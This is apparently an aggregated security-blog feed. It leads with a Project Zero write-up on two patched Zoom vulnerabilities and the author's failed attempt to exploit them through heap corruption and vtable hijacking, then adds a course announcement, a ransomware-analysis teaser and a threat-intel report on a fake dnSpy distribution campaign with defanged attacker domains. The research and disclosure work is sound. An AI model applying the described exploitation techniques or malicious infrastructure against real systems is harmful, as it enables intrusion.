Zooming in on Zero-click Exploits

By: Ryan
18 January 2022 at 17:28

Posted by Natalie Silvanovich, Project Zero


Zoom is a video conferencing platform that has gained popularity throughout the pandemic. Unlike other video conferencing systems that I have investigated, where one user initiates a call that other users must immediately accept or reject, Zoom calls are typically scheduled in advance and joined via an email invitation. In the past, I hadn’t prioritized reviewing Zoom because I believed that any attack against a Zoom client would require multiple clicks from a user. However, a zero-click attack against the Windows Zoom client was recently revealed at Pwn2Own, showing that it does indeed have a fully remote attack surface. The following post details my investigation into Zoom.

This analysis resulted in two vulnerabilities being reported to Zoom. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

Zoom Attack Surface Overview

Zoom’s main feature is multi-user conference calls called meetings that support a variety of features including audio, video, screen sharing and in-call text messages. There are several ways that users can join Zoom meetings. To start, Zoom provides full-featured installable clients for many platforms, including Windows, Mac, Linux, Android and iPhone. Users can also join Zoom meetings using a browser link, but they are able to use fewer features of Zoom. Finally, users can join a meeting by dialing phone numbers provided in the invitation on a touch-tone phone, but this only allows access to the audio stream of a meeting. This research focused on the Zoom client software, as the other methods of joining calls use existing device features.

Zoom clients support several communication features other than meetings that are available to a user’s Zoom Contacts. A Zoom Contact is a user that another user has added as a contact using the Zoom user interface. Both users must consent before they become Zoom Contacts. Afterwards, the users can send text messages to one another outside of meetings and start channels for persistent group conversations. Also, if either user hosts a meeting, they can invite the other user in a manner that is similar to a phone call: the other user is immediately notified and they can join the meeting with a single click. These features represent the zero-click attack surface of Zoom. Note that this attack surface is only available to attackers that have convinced their target to accept them as a contact. Likewise, meetings are part of the one-click attack surface only for Zoom Contacts, as other users need to click several times to enter a meeting.

That said, it’s likely not that difficult for a dedicated attacker to convince a target to join a Zoom call even if it takes multiple clicks, and the way some organizations use Zoom presents interesting attack scenarios. For example, many groups host public Zoom meetings, and Zoom supports a paid Webinar feature where large groups of unknown attendees can join a one-way video conference. It could be possible for an attacker to join a public meeting and target other attendees. Zoom also relies on a server to transmit audio and video streams, and end-to-end encryption is off by default. It could be possible for an attacker to compromise Zoom’s servers and gain access to meeting data.

Zoom Messages

I started out by looking at the zero-click attack surface of Zoom. Loading the Linux client into IDA, it appeared that a great deal of its server communication occurred over XMPP. Based on strings in the binary, it was clear that XMPP parsing was performed using a library called gloox. I fuzzed this library using AFL and other coverage-guided fuzzers, but did not find any vulnerabilities. I then looked at how Zoom uses the data provided over XMPP.

XMPP traffic seemed to be sent over SSL, so I located the SSL_write function in the binary based on log strings, and hooked it using Frida. The output contained many XMPP stanzas (messages) as well as other network traffic, which I analyzed to determine how XMPP is used by Zoom. XMPP is used for most communication between Zoom clients outside of meetings, such as messages and channels, and is also used for signaling (call set-up) when a Zoom Contact invites another Zoom Contact to a meeting.

I spent some time going through the client binary trying to determine how the client processes XMPP, for example, if a stanza contains a text message, how is that message extracted and displayed in the client. Even though the Zoom client contains many log strings, this was challenging, and I eventually asked my teammate Ned Williamson for help locating symbols for the client. He discovered that several old versions of the Android Zoom SDK contained symbols. While these versions are roughly five years old, and do not present a complete view of the client as they only include some libraries that it uses, they were immensely helpful in understanding how Zoom uses XMPP.

Application-defined tags can be added to gloox’s XMPP parser by extending the class StanzaExtension and implementing the method newInstance to define how the tag is converted into a C++ object. Parsed XMPP stanzas are then processed using the MessageHandler class. Application developers extend this class, implementing the method handleMessage with code that performs application functionality based on the contents of the stanza received. Zoom implements its XMPP handling in CXmppIMSession::handleMessage, which is a large function that is an entrypoint to most messaging and calling features. The final processing stage of many XMPP tags is in the class ns_zoom_messager::CZoomMMXmppWrapper, which contains many methods starting with ‘On’ that handle specific events. I spent a fair amount of time analyzing these code paths, but didn’t find any bugs. Interestingly, Thijs Alkemade and Daan Keuper released a write-up of their Pwn2Own bug after I completed this research, and it involved a vulnerability in this area.

RTP Processing

Afterwards, I investigated how Zoom clients process audio and video content. Like all other video conferencing systems that I have analyzed, it uses Real-time Transport Protocol (RTP) to transport this data. Based on log strings included in the Linux client binary, Zoom appears to use a branch of WebRTC for audio. Since I have looked at this library a great deal in previous posts, I did not investigate it further. For video, Zoom implements its own RTP processing and uses a custom underlying codec named Zealot (libzlt).

Analyzing the Linux client in IDA, I found what I believed to be the video RTP entrypoint, and fuzzed it using afl-qemu. This resulted in several crashes, mostly in RTP extension processing. I tried modifying the RTP sent by a client to reproduce these bugs, but it was not received by the device on the other side and I suspected the server was filtering it. I tried to get around this by enabling end-to-end encryption, but Zoom does not encrypt RTP headers, only the contents of RTP packets (as is typical of most RTP implementations).

Curious about how Zoom server filtering works, I decided to set up Zoom On-Premises Deployment. This is a Zoom product that allows customers to set up on-site servers to process their organization’s Zoom calls. This required a fair amount of configuration, and I ended up reaching out to the Zoom Security Team for assistance. They helped me get it working, and I greatly appreciate their contribution to this research.

Zoom On-Premises Deployments consist of two hosts: the controller and the Multimedia Router (MMR). Analyzing the traffic to each server, it became clear that the MMR is the host that transmits audio and video content between Zoom clients. Loading the code for the MMR process into IDA, I located where RTP is processed, and it indeed parses the extensions as a part of its forwarding logic and verifies them correctly, dropping any RTP packets that are malformed.

The code that processes RTP on the MMR appeared different than the code that I fuzzed on the device, so I set up fuzzing on the server code as well. This was challenging, as the code was in the MMR binary, which was not compiled as a relocatable binary (more on this later). This meant that I couldn’t load it as a library and call into specific offsets in the binary as I usually do to fuzz binaries that don’t have source code available. Instead, I compiled my own fuzzing stub that called the function I wanted to fuzz as a relocatable that defined fopen, and loaded it using LD_PRELOAD when executing the MMR binary. Then my code would take control of execution the first time that the MMR binary called fopen, and was able to call the function being fuzzed.

This approach has a lot of downsides, the biggest being that the fuzzing stub can’t accept command line parameters, execution is fairly slow and a lot of fuzzing tools don’t honor LD_PRELOAD on the target. That said, I was able to fuzz with code coverage using Mateusz Jurczyk’s excellent DrSanCov, with no results.

Packet Processing

When analyzing RTP traffic, I noticed that both Zoom clients and the MMR server process a great many packets that didn’t appear to be RTP or XMPP. Looking at the SDK with symbols, one library appeared to do a lot of serialization: libssb_sdk.so. This library contains a great many classes with the methods load_from and save_to defined with identical declarations, so it is likely that they all implement the same virtual class.

One parameter to the load_from methods is an object of class msg_db_t, which implements a buffer that supports reading different data types. Deserialization is performed by load_from methods by reading needed data from the msg_db_t object, and serialization is performed by save_to methods by writing to it.
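To make the idea of a typed read buffer concrete, here is a minimal sketch of a bounds-checked reader. It is not Zoom's msg_db_t: the class name ByteReader, its methods, and the little-endian encoding are all assumptions made for illustration. The only property borrowed from the description above is that a failed read marks the buffer invalid.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <utility>
#include <vector>

// Hypothetical stand-in for a msg_db_t-style read buffer (not Zoom's code).
class ByteReader {
public:
    explicit ByteReader(std::vector<std::uint8_t> data) : data_(std::move(data)) {}

    // Copies n bytes into out, or marks the reader invalid if too few remain.
    bool read(void* out, std::size_t n) {
        assert(pos_ <= data_.size());  // internal invariant of the cursor
        if (invalid_ || n > data_.size() - pos_) {
            invalid_ = true;
            return false;
        }
        if (n != 0) std::memcpy(out, data_.data() + pos_, n);
        pos_ += n;
        return true;
    }

    // Reads an unsigned integer of type T, assuming little-endian encoding.
    template <typename T>
    bool read_le(T& value) {
        std::uint8_t raw[sizeof(T)];
        if (!read(raw, sizeof(T))) return false;
        std::uint64_t acc = 0;
        for (std::size_t i = 0; i < sizeof(T); ++i)
            acc |= static_cast<std::uint64_t>(raw[i]) << (8 * i);
        value = static_cast<T>(acc);
        return true;
    }

    bool invalid() const { return invalid_; }

private:
    std::vector<std::uint8_t> data_;
    std::size_t pos_ = 0;
    bool invalid_ = false;
};
```

A load_from-style method built on such a reader would call read_le once per field and stop as soon as invalid() becomes true.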

After hooking a few save_to methods with Frida and comparing the written output to data sent with SSL_write, it became clear that these serialization classes are part of the remote attack surface of Zoom. Reviewing each load_from method, several contained code similar to the following (from ssb::conf_send_msg_req::load_from).

ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(
    msg_db, &this->str_len, consume_bytes, error_out);  // first length, read from the packet
  str_len = this->str_len;
  if ( str_len )
  {
    mem = operator new[](str_len);                      // buffer sized by the first length
    out_len = 0;
    this->str_mem = mem;
    ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::
        read_str_with_len(msg_db, mem, &out_len);       // reads a second length, then copies

read_str_with_len is defined as follows.

int __fastcall ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::
    read_str_with_len(msg_db_t* msg, signed __int8 *mem, unsigned int *len)
{
  if ( !msg->invalid )
  {
    // Read the string length from the packet into *len.
    ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::operator>>(msg, len, (int)len, 0);
    if ( !msg->invalid )
    {
      if ( *len )
        // Copy *len bytes into mem; *len is never compared with the size of mem.
        ssb::i_stream_t<ssb::msg_db_t,ssb::bytes_convertor>::
            read(msg, mem, *len, 0);
    }
  }
  return msg;
}

Note that the string buffer is allocated based on a length read from the msg_db_t buffer, but then a second length is read from the buffer and used as the length of the string that is read. This means that if an attacker could manipulate the contents of the msg_db_t buffer, they could specify the length of the buffer allocated, and overwrite it with any length of data (up to a limit of 0x1FFF bytes, not shown in the code snippet above).
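The missing check can be illustrated with a simplified sketch. It is not Zoom's fix: the Cursor type, the 32-bit little-endian length fields, and the reuse of 0x1FFF as an allocation cap are assumptions made for this example. The point is only that the second length has to be validated against the size of the buffer that was allocated from the first.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical cursor over an untrusted packet.
struct Cursor {
    const std::uint8_t* p;
    std::size_t left;
};

// Reads a 32-bit little-endian value (the field width is an assumption).
inline bool read_u32(Cursor& c, std::uint32_t& out) {
    if (c.left < 4) return false;
    out = static_cast<std::uint32_t>(c.p[0]) |
          (static_cast<std::uint32_t>(c.p[1]) << 8) |
          (static_cast<std::uint32_t>(c.p[2]) << 16) |
          (static_cast<std::uint32_t>(c.p[3]) << 24);
    c.p += 4;
    c.left -= 4;
    return true;
}

// Illustrative cap, borrowed from the 0x1FFF read limit mentioned in the post.
const std::uint32_t kMaxStringLen = 0x1FFF;

// Same two-length layout as the vulnerable pattern, with the check added.
inline bool load_string(Cursor& c, std::vector<char>& out) {
    std::uint32_t alloc_len = 0;
    std::uint32_t copy_len = 0;
    if (!read_u32(c, alloc_len) || !read_u32(c, copy_len)) return false;
    if (alloc_len > kMaxStringLen) return false;
    if (copy_len > alloc_len) return false;  // the comparison the original code lacks
    if (copy_len > c.left) return false;     // not enough packet data to copy
    std::vector<char> buf(alloc_len);
    assert(copy_len <= buf.size());
    if (copy_len != 0) std::memcpy(buf.data(), c.p, copy_len);
    c.p += copy_len;
    c.left -= copy_len;
    out.swap(buf);
    return true;
}
```

With this check, a packet that declares a 2-byte buffer followed by an 8-byte string is rejected instead of overflowing the allocation.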

I tested this bug by hooking SSL_write with Frida, and sending the malformed packet, and it caused the Zoom client to crash on a variety of platforms. This vulnerability was assigned CVE-2021-34423 and fixed on November 24, 2021.

Looking at the code for the MMR server, I noticed that ssb::conf_send_msg_req::load_from, the method in which the vulnerability occurs, was also present on the MMR server. Since the MMR forwards Zoom meeting traffic from one client to another, it makes sense that it might also deserialize this packet type. I analyzed the MMR code in IDA, and found that deserialization of this class only occurs during Zoom Webinars. I purchased a Zoom Webinar license, and was able to crash my own Zoom MMR server by sending this packet. I was not willing to test a vulnerability of this type on Zoom’s public MMR servers, but it seems reasonably likely that the same code was also in Zoom’s public servers.

Looking further at deserialization, I noticed that all deserialized objects contain an optional field of type ssb::dyna_para_table_t, which is basically a properties table that allows a map of name strings to variant objects to be included in the deserialized object. The variants in the table are implemented by the structure ssb::variant_t, as follows.

union var_data{
        char i8;
        char* i8_ptr;
        short i16;
        short* i16_ptr;
        int i32;
        int* i32_ptr;
        long long i64;
        long long* i64_ptr;
};

struct variant{
        char type;      // width code of the data
        short length;   // 0 for a scalar, otherwise the array length
        var_data data;
};

The value of the type field corresponds to the width of the variant data (1 for 8-bit, 2 for 16-bit, 3 for 32-bit and 4 for 64-bit). The length field specifies whether the variant is an array and its length. If it has the value 0, the variant is not an array, and a numeric value is read from the data field based on its type. If the length field has any other value, the data field is cast to a pointer, and an array of that length is read.
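The type and length rules above can be written down as a small sketch. The function names are hypothetical and unsigned field types are used for simplicity; only the type codes and the meaning of a zero length come from the description.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Width in bytes for each type code described above; 0 for unknown codes.
inline std::size_t element_width(std::uint8_t type) {
    switch (type) {
        case 1: return 1;  // 8-bit
        case 2: return 2;  // 16-bit
        case 3: return 4;  // 32-bit
        case 4: return 8;  // 64-bit
        default: return 0;
    }
}

// A non-zero length field marks the variant as an array.
inline bool is_array(std::uint16_t length) { return length != 0; }

// Payload size: one element for a scalar, length elements for an array.
inline std::size_t payload_bytes(std::uint8_t type, std::uint16_t length) {
    const std::size_t width = element_width(type);
    assert(width <= 8);  // widths only come from the table above
    return is_array(length) ? width * length : width;
}

// Code that expects a scalar 32-bit value should check both fields
// before it touches the data union.
inline bool is_scalar_u32(std::uint8_t type, std::uint16_t length) {
    return type == 3 && !is_array(length);
}
```

A handler that calls something like is_scalar_u32 before reading data.i32 would not confuse an array pointer with a number, which is the kind of type check discussed next.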

My immediate concern with this implementation was that it could be prone to type confusion. One possibility is that a numeric value could be confused with an array pointer, which would allow an attacker to create a variant with a pointer that they specify. However, both the client and MMR perform very aggressive type checks on variants they treat as arrays. Another possibility is that a pointer could be confused with a numeric value. This could allow an attacker to determine the address of a buffer they control if the value is ever returned to the attacker. I found a few locations in the MMR code where a pointer is converted to a numeric value in this way and logged, but nowhere that an attacker could obtain the incorrectly cast value. Finally, I looked at how array data is handled, and I found several locations where byte array variants are converted to strings. Not all of them checked that the byte array has a null terminator. This meant that if these variants were converted to strings, the string could contain the contents of uninitialized memory.
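As a contrast to the unchecked conversion, the following sketch turns a byte array into a string without relying on a null terminator. The function name is hypothetical and this is not the fix Zoom shipped. It only shows that the array length already carried by the variant is enough to bound the read.

```cpp
#include <cassert>
#include <cstddef>
#include <cstring>
#include <string>

// Converts a byte-array payload to a string without reading past len bytes,
// whether or not the payload contains a null terminator.
inline std::string bytes_to_string(const char* data, std::size_t len) {
    if (data == nullptr || len == 0) return std::string();
    const void* nul = std::memchr(data, '\0', len);
    const std::size_t n =
        nul ? static_cast<std::size_t>(static_cast<const char*>(nul) - data) : len;
    assert(n <= len);
    return std::string(data, n);
}
```

An unterminated 4-byte array yields a 4-character string here, rather than a string that continues into whatever memory follows the buffer.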

Most of the time, packets sent to the MMR by one user are immediately forwarded to other users without being deserialized by the server. For some bugs, this is a useful feature, for example, it is what allows CVE-2021-34423 discussed earlier to be triggered on a client. However, an information leak in variants needs to occur on the server to be useful to an attacker. When a client deserializes an incoming packet, it is for use on the device, so even if a deserialized string contains sensitive information, it is unlikely that this information will be transmitted off the device. Meanwhile, the MMR exists expressly to transmit information from one user to another, so if a string gets deserialized, there is a reasonable chance that it gets sent to another user, or alters server behavior in an observable way. So, I tried to find a way to get the server to deserialize a variant and convert it to a string. I eventually figured out that when a user logs into Zoom in a browser, the browser can’t process serialized packets, so the MMR must convert them to strings so they can be accessed through web requests. Indeed, I found that if I removed the null terminator from the user_name variant, it would be converted to a string and sent to the browser as the user’s display name.

The vulnerability was assigned CVE-2021-34424 and fixed on November 24, 2021. I tested it on my own MMR as well as Zoom’s public MMR, and it worked and returned pointer data in both cases.

Exploit Attempt

I attempted to exploit my local MMR server with these vulnerabilities, and while I had success with portions of the exploit, I was not able to get it working. I started off by investigating the possibility of creating a client that could trigger each bug outside of the Zoom client, but client authentication appeared complex and I lacked symbols for this part of the code, so I didn’t pursue this as I suspected it would be very time-consuming. Instead, I analyzed the exploitability of the bugs by triggering them from a Linux Zoom client hooked with Frida.

I started off by investigating the impact of heap corruption on the MMR process. MMR servers run on CentOS 7, which uses a modern glibc heap, so exploiting heap unlinking did not seem promising. I looked into overwriting the vtable of a C++ object allocated on the heap instead.

I wrote several Frida scripts that hooked malloc on the server, and used them to monitor how incoming traffic affects allocation. It turned out that there are not many ways for an attacker to control memory allocation on an MMR server that are useful for exploiting this vulnerability. There are several packet types that an attacker can send to the server that cause memory to be allocated on the heap and then freed when processing is finished, but far fewer where the attacker can separately trigger the allocation and the free. Moreover, the MMR server performs different types of processing in separate threads that use unique heap arenas, so many areas of the code where this type of allocation is likely to occur, such as connection management, allocate memory in a different heap arena than the thread where the bug occurs. The only such allocations I could find that were made in the same arena were related to meeting set-up: when a user joins a meeting, certain objects are allocated on the heap, which are then freed when they leave the meeting. Unfortunately, these allocations are difficult to automate as they require many unique user accounts in order for the allocation to be performed repeatedly, and allocation takes an observable amount of time (seconds).

I eventually wrote Frida scripts that looked for free chunks of unusual sizes that bordered C++ objects with vtables during normal MMR operation. There were a few allocation sizes that met these criteria, and since CVE-2021-34423 allows for the size of the buffer that is overflowed to be specified by the attacker, I was able to corrupt the memory of the adjacent object. Unfortunately, heap verification was very robust, so in most cases, the MMR process would crash due to a heap verification error before a virtual call was made on the corrupted object. I eventually got around this by focusing on allocation sizes that are small enough to be stored in fastbins by the heap, as heap chunks that are stored in fastbins do not contain verifiable heap metadata. Chunks of size 58 turned out to be the best choice, and by triggering the bug with an allocation of that size, I was able to control the pointer of a virtual call about one in ten times I triggered the bug.
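The fastbin reasoning can be checked with a little arithmetic. The sketch below reproduces glibc's request-to-chunk-size rounding for 64-bit builds with default settings. It assumes that "size 58" refers to a request of 58 bytes in decimal, which the post does not state, and the constant and function names are invented for this example.

```cpp
#include <cassert>
#include <cstddef>

// 64-bit glibc malloc constants with default tuning (assumed for this sketch).
constexpr std::size_t kSizeSz = 8;            // SIZE_SZ: size of the chunk header field
constexpr std::size_t kAlignMask = 15;        // MALLOC_ALIGNMENT - 1
constexpr std::size_t kMinSize = 32;          // MINSIZE: smallest possible chunk
constexpr std::size_t kDefaultMaxFast = 128;  // largest chunk size served from fastbins

// Equivalent of glibc's request2size macro: add the header, round up to 16.
constexpr std::size_t chunk_size_for_request(std::size_t req) {
    return (req + kSizeSz + kAlignMask < kMinSize)
               ? kMinSize
               : ((req + kSizeSz + kAlignMask) & ~kAlignMask);
}

// True when a request of this size is served from a fastbin.
inline bool request_lands_in_fastbin(std::size_t req) {
    const std::size_t chunk = chunk_size_for_request(req);
    assert(chunk % (kAlignMask + 1) == 0);  // chunk sizes are 16-byte aligned
    return chunk <= kDefaultMaxFast;
}
```

Under these assumptions a 58-byte request becomes an 80-byte (0x50) chunk, well inside the default fastbin range, while a 200-byte request becomes a 208-byte chunk and is handled by the regular bins.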

The next step was to figure out where to point the pointer I could control, and this turned out to be more challenging than I expected. The MMR process did not have ASLR enabled when I did this research (it was enabled in version 4.6.20211128.136, which was released on November 28, 2021), so I was hoping to find a series of locations in the binary that this call could be directed to that would eventually end in a call to execv with controllable parameters, as the MMR initialization code contains many calls to this function. However, there were a few features of the server that made this difficult. First, only the MMR binary was loaded at a fixed location. The heap and system libraries were not, so only the actual MMR code was available without bypassing ASLR. Second, if the MMR crashes, it has an exponential backoff which culminates in it respawning every hour on the hour. This limits how many exploit attempts an attacker has. It is realistic that an attacker might spend days or even weeks trying to exploit a server, but this still limits them to hundreds of attempts. This means that any exploit of an MMR server would need to be at least somewhat reliable, so certain techniques that require a lot of attempts, such as allocating a large buffer on the heap and trying to guess its location, were not practical.

I eventually decided that it would be helpful to allocate a buffer on the heap with controlled contents and determine its location. This would make the exploit fairly reliable in the case that the overflow successfully leads to a virtual call, as the buffer could be used as a fake vtable, and also contain strings that could be used as parameters to execv. I tried using CVE-2021-34424 to leak such an address, but wasn’t able to get this working.

This bug allows the attacker to provide a string of any size, which then gets copied out of bounds up until a null character is encountered in memory, and then returned. It is possible for CVE-2021-34424 to return a heap pointer, as the MMR maps the heap that gets corrupted at a low address that does not usually contain null bytes. However, I could not find a way to force a specific heap pointer to be allocated next to the string buffer that gets copied out of bounds. C++ objects used by the MMR tend to be virtual objects, so the first 64 bits of most object allocations are a vtable which contains null bytes, ending the copy. Other allocated structures, especially larger ones, tend to contain non-pointer data. I was able to get this bug to return heap pointers by specifying a string that was less than 64 bits long, so the nearby allocations were sometimes the pointers themselves, but allocations of this size are so frequent that it was not possible to ascertain what heap data they pointed to with any accuracy.
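To see how null bytes bound what a copy-until-null leak returns, the sketch below counts how many bytes of an 8-byte pointer would be copied before the first zero byte. It assumes the little-endian layout of x86-64, and the function name and any addresses tried with it are made up for illustration.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Number of bytes a copy-until-null routine would emit when it runs into
// an 8-byte pointer stored in little-endian order.
inline std::size_t bytes_before_null(std::uint64_t pointer_value) {
    unsigned char raw[sizeof(pointer_value)];
    for (std::size_t i = 0; i < sizeof(raw); ++i)
        raw[i] = static_cast<unsigned char>((pointer_value >> (8 * i)) & 0xFF);
    std::size_t n = 0;
    while (n < sizeof(raw) && raw[n] != 0) ++n;
    assert(n <= sizeof(raw));
    return n;
}
```

For a made-up low heap address such as 0x025f3a10, four bytes are copied before the zero upper bytes end the string, which is enough to recover the address. Any pointer whose low byte happens to be zero contributes nothing, and the copy always stops at the first zero byte it meets.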

One last idea I had was to use another type confusion bug to leak a pointer to a controllable buffer. There is one such bug in the processing of deserialized ssb::kv_update_req objects. This object’s ssb::dyna_para_table_t table contains a variant named nodeid which represents the specific Zoom client that the message refers to. If an attacker changes this variant to be of type array instead of a 32-bit integer, the address of the pointer to this array will be logged as a string. I tried to combine CVE-2021-34424 with this bug, hoping that it might be possible for the leaked data to be this log string that contains pointer information. Unfortunately, I wasn’t able to get this to work because of timing: the log entry needs to be logged at almost exactly the same time as the bug is triggered so that the log data is still in memory, and I wasn't able to send packets fast enough. I suspect it might be possible for this to work with improved automation, as I was relying on clients hooked with Frida and browsers to interact with the Zoom server, but I decided not to pursue this as it would require tooling that would take substantial effort to develop.

Conclusion

I performed a security analysis of Zoom and reported two vulnerabilities. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

The vulnerabilities in Zoom’s MMR server are especially concerning, as this server processes meeting audio and video content, so a compromise could allow an attacker to monitor any Zoom meetings that do not have end-to-end encryption enabled. While I was not successful in exploiting these vulnerabilities, I was able to use them to perform many elements of exploitation, and I believe that an attacker would be able to exploit them with sufficient investment. The lack of ASLR in the Zoom MMR process greatly increased the risk that an attacker could compromise it, and it is positive that Zoom has recently enabled it. That said, if vulnerabilities similar to the ones that I reported still exist in the MMR server, it is likely that an attacker could bypass it, so it is also important that Zoom continue to improve the robustness of the MMR code.

It is also important to note that this research was possible because Zoom allows customers to set up their own servers. No other video conferencing solution with proprietary servers that I have investigated allows this, so it is unclear how these results compare to other video conferencing platforms.

Overall, while the client bugs that were discovered during this research were comparable to what Project Zero has found in other videoconferencing platforms, the server bugs were surprising, especially given that the server lacked ASLR and supports modes of operation that are not end-to-end encrypted.

There are a few factors that commonly lead to security problems in videoconferencing applications that contributed to these bugs in Zoom. One is the huge amount of code included in Zoom. There were large portions of code that I couldn’t determine the functionality of, and many of the classes that could be deserialized didn’t appear to be commonly used. This both increases the difficulty of security research and increases the attack surface by making more code that could potentially contain vulnerabilities available to attackers. In addition, Zoom uses many proprietary formats and protocols, which meant that understanding the attack surface of the platform and creating the tooling to manipulate specific interfaces was very time-consuming. Using the features we tested also required paying roughly $1500 USD in licensing fees. These barriers to security research likely mean that Zoom is not investigated as often as it could be, potentially leading to simple bugs going undiscovered.

Still, my largest concern in this assessment was the lack of ASLR in the Zoom MMR server. ASLR is arguably the most important mitigation in preventing exploitation of memory corruption, and most other mitigations rely on it on some level to be effective. There is no good reason for it to be disabled in the vast majority of software. There has recently been a push to reduce the susceptibility of software to memory corruption vulnerabilities by moving to memory-safe languages and implementing enhanced memory mitigations, but this relies on vendors using the security measures provided by the platforms they write software for. All software written for platforms that support ASLR should have it (and other basic memory mitigations) enabled.

The closed nature of Zoom also impacted this analysis greatly. Most video conferencing systems use open-source software, either WebRTC or PJSIP. While these platforms are not free of problems, it’s easier for researchers, customers and vendors alike to verify their security properties and understand the risk they present because they are open. Closed-source software presents unique security challenges, and Zoom could do more to make their platform accessible to security researchers and others who wish to evaluate it. While the Zoom Security Team helped me access and configure server software, it is not clear that support is available to other researchers, and licensing the software was still expensive. Zoom, and other companies that produce closed-source security-sensitive software, should consider how to make their software accessible to security researchers.

Planned Upcoming Classes

15 January 2022 at 09:38

Some people asked me if I had a schedule of trainings I plan to do in the coming months. Well, here it is. At this point I would like to gauge interest, and plan the course hours (time zone) to accommodate the majority of participants.

I am moving to classes that are partly full days and partly half days. The full day sessions are going to be recorded for the participants (so that if anyone misses something because of urgent work, inconvenient time zone, etc., the recording should help). The half days are not recorded, and should be easier to handle, since they are only about 4 hours long.

Here is the planned course list with dates (f=full day, all others are half-days). The cost is in USD (paid by individual / paid by a company):

  • COM Programming with C++ (3 days): April 25, 26, 27, 28, May 2, 3 (Cost: 700/1300)
  • Windows System Programming (5 days): May 16 (f), 17, 18, 19, 23 (f), 24, 25, 26 (Cost: 800/1500)
  • Windows Kernel Programming (4 days): June 6 (f), 8, 9, 13 (f), 14 (Cost: 800/1500)
  • Windows Internals (5 days): July 11 (f), 12, 13, 14, 18 (f), 19, 20, 21 (Cost: 800/1500)
  • Advanced Kernel Programming (New!) (4 days): September 12 (f), 13, 14, 15, 19, 20, 21 (Cost: 800/1500)

“Advanced Kernel Programming” is a new class I’m planning, suitable for those who participated in “Windows Kernel Programming” (or have equivalent knowledge). This course will cover file system mini-filters, NDIS filters, and the Windows Filtering Platform (WFP), along with other advanced programming techniques.

I may add more classes after September, but it’s too far from now to make such a commitment.

If you are interested in one or more of these classes, please write an email to [email protected], and provide your name, preferred contact email, and your time zone. It’s not a commitment on your part, and you may change your mind later on, but the interest should be genuine, meaning the dates and topics work for you.

Also, if there are other classes you would like me to deliver, you are welcome to suggest them. No promises, of course, but if there is enough interest, I will consider creating and delivering them.

If you’d like a private class for your team, get in touch. Syllabi can be customized as needed.

Have a great year ahead!

zodiacon

Malware Analysis: Ragnarok Ransomware

By: voidsec
28 April 2021 at 08:13

The analysed sample is malware employed by the threat actor known as Ragnarok. The ransomware is responsible for file encryption and is typically executed by the actors themselves on the compromised machines. The name of the analysed executable is xs_high.exe, but others have been found used by the same ransomware family (such as […]

The post Malware Analysis: Ragnarok Ransomware appeared first on VoidSec.

Fake dnSpy - When Hackers Don't Play Fair Either

By: liuchuang
12 January 2022 at 13:06

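Background

dnSpy is a popular tool for debugging, modifying and decompiling .NET programs. Security researchers often use it when analyzing .NET programs or malware.

On January 8, 2022, BLEEPING COMPUTER reported that attackers had used a malicious build of dnSpy in a campaign targeting security researchers and developers. @MalwareHunterTeam published a tweet disclosing the Github repositories that distributed the malicious dnSpy build, which goes on to install a clipboard hijacker, Quasar RAT, a cryptocurrency miner and other malware.

The official dnSpy Git repository shows that the tool is in Archived state: it stopped being updated in 2020 and has no official website.

The attackers took advantage of exactly this. They registered the domain dnspy[.]net and designed a very polished website to distribute the malicious dnSpy program.

They also bought Google search ads so that the site ranked near the top of search results, widening its reach.

As of January 9, 2022, the website is offline.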

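Sample Analysis

dnspy[.]net distributed a modified build of dnSpy 6.1.8, which is also the last officially released version.

The infection is carried out by modifying the entry code of dnSpy.dll, one of dnSpy's core modules.

The normal entry function of dnSpy.dll is as follows:

image_3

The modified entry point adds an executable that is loaded from memory:

image_4-1

The program is named dnSpy Reader and is obfuscated.

It subsequently uses mshta to deliver a miner, a clipboard hijacker, a RAT and other payloads.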

Github

The attackers created two Github repositories:

  • https[:]//github[.]com/carbonblackz/dnSpy
  • https[:]//github[.]com/isharpdev/dnSpy

The usernames used were isharpdev and carbonblackz. Keep these names in mind, as they come up again later.

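Infrastructure Pivoting

Analyzing dnspy[.]net turned up some interesting traces that allowed us to pivot to more of the attackers' infrastructure:

dnspy.net

The domain dnspy[.]net was registered on April 14, 2021.

The domain has multiple resolution records, most of which belong to the CDN service provided by Cloudflare. However, on reviewing the detailed resolution history, we found that between December 13 and January 3 the domain used the IP 45.32.253[.]0. Unlike the Cloudflare CDN IPs, this IP has only a small number of mapping records.

The PDNS records for this IP show that most of the domains mapped to it appear to be spoofed domains, and most of them are already offline.

Some of these domains are download sites for hacking tools, office software and the like, and all of them appear to be spoofed versions of legitimate websites, as does the dnspy.net domain from the disclosed incident. Based on this pattern of behavior, we suspected that all of these domains were assets owned by the attackers, so we analyzed them further.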

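Related Domain Analysis

Take toolbase[.]co as an example. This domain historically hosted a hacking-tool download site, and the archive password for the hacking tools on its home page was “CarbonBlackz”, the same as the name of one of the GitHub users who uploaded the malicious dnSpy.

image_10

The site’s page title was later updated to Combolist-Cloud, which matches the combolist.cloud domain record found among the resolution records of 45.32.253[.]0. Some files were distributed via mediafire or gofile.

image_11

This domain appears to be a spoof of combolist[.]top, a forum that provides leaked data.

image_12

torfiles[.]net is likewise a software download site.

image_13

Windows-software[.]co and windows-software[.]net are download sites built from the same template.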

image_14

image_15

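shortbase[.]net has the same CyberPanel installation page as dnspy[.]net, and both are dated December 19, 2021.

image_16

The image below shows the historical CyberPanel installation page of dnspy[.]net as recorded by the Wayback Machine.

image_17

coolmint[.]net is also a download site and was still reachable as of January 12, 2022, but its download links simply redirect to mega[.]nz.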

image_18

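filesr[.]net and toolbase[.]co use the same template.

image_19

The site’s About us page was not even modified,

image_20

and the content of that page was adapted from the About us page of FileCR[.]com.

2022-01-11-19-57-10

The software on filesr[.]net was distributed via Dropbox, but all of the links are currently dead.

Finally, zippyfiles[.]net is a hacking-tool download site.
2022-01-11-19-53-30
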